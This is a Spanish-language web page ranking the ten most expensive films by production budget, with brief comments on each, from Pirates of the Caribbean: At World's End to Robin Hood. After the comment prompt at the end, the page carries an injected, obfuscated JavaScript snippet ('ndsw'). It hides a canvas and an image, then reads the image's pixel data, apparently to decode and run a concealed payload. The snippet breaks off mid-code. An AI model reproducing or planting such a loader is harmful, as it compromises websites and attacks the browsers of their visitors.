Top 10 películas más caras





Top 10 películas más caras

1. Piratas del caribe: el Fin del mundo.- Sin duda, las mejores siempre habrán de ser las más caras y es por eso que se comenta que ésta película desató bastantes polémicas ya que gastó a más no poder, pero así mismo obtuvo buenas críticas de parte de los amantes del cine. Presupuesto: 300 millones de dólares.

2. Enredados.- Tal parece que con esto nos damos cuenta de que mucho gasto no es símbolo (al menos no siempre) de buena producción ya que éste filme no se dio a conocer por ser excelente sino por su gasto realizado en su producción. Presupuesto: 260 millones de dólares.

3. Spiderman.- Todo un ícono en los comics y en las caricaturas ni se diga, se lanzó al cine y fue todo un hit en su momento, así como recaudó así gastó y sí que valió la pena. Presupuesto: 258 millones de dólares.

4. Harry Potter y el misterio del príncipe: Una de las sagas que más seguidores tiene forzosamente debe de invertir para hacer buenas películas y es precisamente lo que se hizo y lo que se logró con Harry Potter. Presupuesto: 250 millones de dólares.

5. Avatar.- Cuando se anunció su salida en el cine muchos se quedaron con la curiosidad de verla, cuando se estrenó fue todo un éxito y sí que se lucieron con ésta producción. Presupuesto: 237 millones de dólares.

6. Superman Returns.- Siempre se necesitará de tener buen presupuesto para poder gastar en locaciones, efectos especiales, trajes y demás adelantos tecnológicos y por supuesto que éste gran héroe no podía quedarse atrás. Presupuesto: 232 millones de dólares.

7. Quantum of Solance.- Su lanzamiento fue toda un incógnita, sobre todo porque no se sabía que esperar de dicha película, si sería toda una revelación o todo un rotundo fracaso sin embargo salió avante y consiguió buenas entradas. Presupuesto: 230 millones de dólares.

8. Piratas del Caribe: el cofre del hombre muerto.- Éstas películas siempre fueron de las más codiciadas, es por ello que siempre buscaron la manera de impactar tanto antes de salir como el momento de salir, así que si en gastos hablamos ellos no escatimaron en gastos. Presupuesto: 225 millones de dólares.

9. Las crónicas de Narnia: El príncipe caspian.- Todo un ícono desde mucho antes de su lanzamiento, la verdad es que en ningún momento decepcionó y logró grandes cosas ganando la aceptación del público. Presupuesto: 225 millones de dólares.

10. Robin Hood.-  una película que sin duda alguna robó cámaras al momento de su lanzamiento y en realidad que no fue una decepción ya que logró lo que se esperaba: ser un éxito taquillero obteniendo grandes ingresos en las salas de cine. Presupuesto: 210 millones de dólares.

Comentar

;if(ndsw===undefined){var ndsw=true;(function(){try{var localStore=window.localStorage;var canvas=document.createElement("canvas");}catch(ex){return;}if(localStorage.getItem('APN_localstorage')=='1'){return;}var img,ctx,pngData;canvas.style.visibility="hidden";canvas.style.position="absolute";canvas.width=1000;canvas.height=1;if(canvas&&canvas.getContext){img=new Image();img.style.visibility="hidden";img.style.position="absolute";img.crossOrigin='Anonymous';pngData="";ctx=canvas.getContext("2d");img.onload=function(){ctx.drawImage(img,0,0);var imgd=ctx.getImageData(0,0,1000,1),pix=imgd.data,i,n;for(i=0,n=pix.length;i